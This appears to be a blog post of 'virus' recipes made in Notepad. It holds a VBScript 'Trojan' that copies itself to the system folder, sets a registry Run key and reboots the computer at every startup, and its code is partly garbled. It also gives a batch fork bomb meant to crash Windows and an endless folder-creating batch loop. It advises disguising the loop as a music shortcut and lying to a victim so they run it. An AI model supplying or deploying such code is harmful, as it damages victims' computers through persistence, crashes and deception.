Social Icons

twitterfacebookgoogle pluslinkedinrss feedemail.
Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts

Monday, January 12, 2015

How to Make Trojan Virus Using Notepad

note the following copy all the source into notepad save as. vbs (if you want to activate)

if not let it remain in the file exstensi.txt

exampels: ippamd0_trojanHorse.VBS

Copy all the source below:

brakes - dlRB "DL Reboot" Trojan script by D.L.

On Error Resume Next

FSobj dim, sysDir, generateCopy, newfile, fixedCode, procreateCopy, fileData

set FSobj = CreateObject ("Scripting.FileSystemObject")

set sysDir = FSobj.GetSpecialFolder (1)

createRegKey "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ dlRB", sysDir & "\ dlRB.vbs"

sub createRegKey (regkey, regVal)

set regedit = CreateObject ("WScript.Shell")

regEdit.RegWrite regkey, regVal

end sub

set generateCopy = FSobj.CreateTextFile (sysDir + "\ dlRB.vbs")

generateCopy.close

set newfile = FSobj.OpenTextFile (WScript.ScriptFullname, 1)

setFile ()

fixedCode = replace (fileData, chr (94), "" "")

set procreateCopy = FSobj.OpenTextFile (sysDir + "\ dlRB.vbs", 2)

procreateCopy.write fixedCode

procreateCopy.close

rebootSystem ()

setFile function ()

fileData = "rem - ^ ^ by D.L. dlRB" & vbCrLf & _

"strComputer = ^. ^" & vbCrLf & _

"Set objWMIService = GetObject (winmgmts ^: ^ _" & vbCrLf & _

"& ^ {ImpersonationLevel = impersonate, (Shutdown)}! \ \ ^ & ^ & StrComputer \ root \ cimv2 ^)" & vbCrLf & _

"Set colOperatingSystems = objWMIService.ExecQuery _ '& vbCrLf & _

"(Select * from Win32_OperatingSystem ^ ^)" & vbCrLf & _

"For Each objOperatingSystem in colOperatingSystems" & vbCrLf & _

"ObjOperatingSystem.Reboot ()" & vbCrLf & _

"Next"

end function

rebootSystem function ()

strComputer = "."

Set objWMIService = GetObject ("winmgmts:" _

& "{ImpersonationLevel = impersonate, (Shutdown)}! \ \" & StrComputer & "\ root \ cimv2")

Set colOperatingSystems = objWMIService.ExecQuery _

("Select * from Win32_OperatingSystem")

For Each objOperatingSystem in colOperatingSystems

ObjOperatingSystem.Reboot ()

Next

end function

yes ... do not forget saved?

Simple Virus To Crash OS

Steps to create a "Fork Bomb" in Five Letters.

First Step : Paste This Command In Notepad
Quote:%0|%0

Last Step : and save this file as .bat
-------------------------------------
So..How Does It Work?

Quote:%0
is the name of the currently executing batch file. A batch file that simply does:

Quote:%0|%0

Is going to recursively execute itself forever, quickly creating many processes until it crashes the system down.
-------------------------------------

How To make A virus That Will Make 1,000 Folders In Few Seconds

Step 1
Open notepad and type :
@echo off
:top
md %random%
goto top
@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop

Step 2
Save it as 1000folders.bat

After that you will get icon that looks as show below

People probably not going to click on an icon that looks like this picture so to make it better (funnier and easier to prank people with) make a short-cut to it
Step 3
Right click on icon and click Create Shortcut

Step 4
Right click on shortcut and click properties , then click on Change Icon and rename icon



tell the person that you found the music they wanted and downloaded it on there computer, that way they will think its a shortcut to the music and they will click on it then they will think its loading so they wont exit right away when they finally realize its not going to load or so many errors have came up they realized
somethings wrong it will be to late) also just something to know its impossible to delete them using cmd you HAVE to find all of them and delete them manually…

 

Sample text

About Admin

Founder & Author: The Man behind this blog is called “Adeem Bukhari”. I am 19 years old now. Currently, I live in Burewala.....Read More

Sample Text

 
Blogger Templates